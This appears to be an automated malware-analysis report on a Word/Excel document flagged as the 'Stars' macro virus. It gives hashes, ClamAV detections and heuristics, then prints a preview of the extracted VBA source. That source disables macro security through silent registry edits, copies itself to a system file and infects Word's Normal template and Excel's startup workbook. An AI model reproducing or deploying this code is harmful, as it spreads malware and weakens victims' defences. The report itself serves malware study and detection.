Office (OLE) malware analysis — malicious · 38880a7c00b13b9d

MALICIOUS

Office (OLE)

33.5 KB Created: 2000-10-18 21:58:00 Authoring application: Microsoft Word 9.0 First seen: 2012-06-14

MD5: 990c74f9d33db620b15b267038bb2541 SHA-1: 903de69efc1ddc032e99a0c533fc4fb0efc1bd93 SHA-256: 38880a7c00b13b9d75ff2ba9ae9c53bc46f105cb15c3ca9eaa312b46c2fcf56e

360 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1204.002 Malicious File

The file contains VBA macros that execute upon opening, including a Workbook_Open macro. This macro attempts to write to the registry via 'C:\Protection.reg' and execute 'regedit /s C:\Protection.reg', and also attempts to copy itself to 'C:\Windows\Stars.drv' and infect other documents. The presence of Shell() and CreateObject() calls, along with ClamAV detections of 'Win.Trojan.Psycho-3' and 'Doc.Trojan.Darkstar-2', strongly indicates malicious intent to download and execute further payloads.

Heuristics 7

ClamAV: Win.Trojan.Psycho-3 critical CLAMAV_DETECTION

ClamAV detected this file as malware: Win.Trojan.Psycho-3
VBA macros detected medium 5 related findings OLE_VBA_MACROS

Document contains VBA macro code
Shell() call in VBA critical OLE_VBA_SHELL

Shell() call in VBA
Document_Open macro high OLE_VBA_DOCOPEN

Document_Open macro
Workbook_Open macro high OLE_VBA_WBOPEN

Workbook_Open macro
CreateObject call high OLE_VBA_CREATEOBJ

CreateObject call
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC

Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename	Kind	Source	Size
`macros.bas`	vba-macro	oletools.olevba.extract_macros (decoded VBA source)	5779 bytes
SHA-256: `a537846c2c7b32f9b17e79f0055194399791f8c6967955dd6daa40a0d82262df`
Detection ClamAV: Doc.Trojan.Darkstar-2 Obfuscation or payload: unlikely
Preview script First 1,000 lines of the extracted script Attribute VB_Name = "ThisDocument" Attribute VB_Base = "1Normal.ThisDocument" Attribute VB_GlobalNameSpace = False Attribute VB_Creatable = False Attribute VB_PredeclaredId = True Attribute VB_Exposed = True Attribute VB_TemplateDerived = True Attribute VB_Customizable = True ' Stars ' Office Virus (Infects Word And Excel) ' By The WalruS 11/00 v1.00 Private Sub Workbook_Deactivate() On Error Resume Next With Application: .DisplayAlerts = 0: .ScreenUpdating = 0: .DisplayStatusBar = 0: .UserName = "Stars": End With Open "C:\Protection.reg" For Output As #1 Print #1, "REGEDIT4" Print #1, "" Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Excel\Microsoft Excel]" Print #1, """Options6""=dword:00000000" Print #1, "[HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Excel\Security]" Print #1, """Level""=dword:00000001" Close #1 Shell "regedit /s C:\Protection.reg", vbHide: Kill ("C:\Protection.reg") Installed = Dir(Application.StartupPath & "\Book1.") If Installed = "" Then Open "C:\Windows\Stars.drv" For Output As #1: Print #1, VBProject.vbcomponents(1).CodeModule.Lines(1, 130): Close #1 VBAProject.ThisWorkbook.SaveAs FileName:=Application.StartupPath & "\Book1.", FileFormat:=xlNormal, AddToMru:=False End If Set ActiveWB = ActiveWorkbook.VBProject.vbcomponents("ThisWorkbook").CodeModule: Set ThisWB = ThisWorkbook.VBProject.vbcomponents("ThisWorkbook").CodeModule If ActiveWB.Lines(1, 1) <> "' Stars" Then ActiveWB.DeleteLines 1, ActiveWB.CountofLines ActiveWB.AddFromFile ("C:\Windows\Stars.drv") ActiveWorkbook.Save End If Set Wordinfect = CreateObject("Word.Application") Set nor = Wordinfect.NormalTemplate.VBProject.vbcomponents(1).CodeModule If nor.Lines(1, 1) <> "' Stars" Then Wordinfect.Options.SaveNormalPrompt = False nor.DeleteLines 1, nor.CountofLines nor.InsertLines 1, ThisWB.Lines(1, ThisWB.CountofLines) End If Wordinfect.Quit End Sub Private Sub Document_Open() On Error Resume Next If Second(Now) > 55 Then Call WDPayload With Application: .DisplayAlerts = 0: .ScreenUpdating = 0: .DisplayStatusBar = 0: .UserName = "Stars": End With With Options: .VirusProtection = 0: .SaveNormalPrompt = 0: .ConfirmConversions = 0: End With CommandBars("Macro").Controls("Security...").Enabled = False System.PrivateProfileString("", "HKEY_CURRENT_USER\Software\Microsoft\Office\9.0\Word\Security", "Level") = 1& ActiveDocument.ReadOnlyRecommended = False If Left(ActiveDocument.Name, 8) = "Document" Then Exit Sub Set nor = NormalTemplate.VBProject.vbcomponents(1).CodeModule: Set doc = ActiveDocument.VBProject.vbcomponents(1).CodeModule Open "C:\Windows\Stars.drv" For Output As #1: Print #1, VBProject.vbcomponents(1).CodeModule.Lines(1, 130): Close #1 If nor.Lines(1, 1) <> "' Stars" Then nor.DeleteLines 1, nor.CountofLines nor.AddFromFile ("C:\Windows\Stars.drv") NormalTemplate.Save ElseIf doc.Lines(1, 1) <> "' Stars" Then doc.DeleteLines 1, doc.CountofLines doc.AddFromFile ("C:\Windows\Stars.drv") End If NormalTemplate.Saved = True If ActiveDocument.Saved <> True Then ActiveDocument.Save Set xlinfect = CreateObject("Excel.Application") Infected = Dir(xlinfect.Application.StartupPath & "\Book1.") If Infected = "" Then Set Book1Inf = xlinfect.Workbooks.Add Book1Inf.VBProject.vbcomponents("ThisWorkbook").CodeModule.InsertLines 1, nor.Lines(1, nor.CountofLines) Book1Inf.SaveAs xlinfect.Application.StartupPath & "\Book1." Book1Inf.Close End If xlinfect.Quit End Sub Private Sub Workbook_Open() If Second(Now) > 55 Then On Error Resume Next Randomize StarWidth = 25: StarHeight = 25 For i = 1 To 10 TopPos = Rnd() * (ActiveWindow.UsableHeight - StarHeight) LeftPos = Rnd() * (ActiveWindow.UsableWi ... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.